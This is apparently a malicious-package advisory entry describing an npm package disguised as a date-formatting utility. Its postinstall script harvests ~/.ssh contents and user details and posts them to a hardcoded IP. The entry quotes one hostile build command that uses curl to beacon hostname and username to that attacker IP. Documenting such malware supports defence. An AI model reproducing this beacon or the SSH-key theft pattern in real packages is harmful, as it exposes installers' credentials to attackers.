MAL-2026-5732

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (71d6b96fe99e7f8503cb07df05d6b621dc8e8243fc7288844678d8aff043a654) The package presents itself as a 'simple date formatting utility' (index.js exports a trivial formatDate wrapper around toLocaleDateString), but ships a postinstall.js that runs automatically on npm install. The postinstall script reads the contents of the installer's ~/.ssh directory via fs.readdirSync, collects os.userInfo() username and platform information, and POSTs the data to https://124.221.154.135/post — a hardcoded bare-IP destination with no documented purpose. Chinese-language comments in the file explicitly describe it as SSH-key theft and C2 exfiltration. The package.json additionally declares a build script `curl http://124.221.154.135//pre?h=$(hostname)&u=$(whoami)` that beacons hostname/username over plain HTTP to the same attacker IP, confirming the infrastructure. The benign date-utility facade is a cover story for credential-harvesting on installer machines.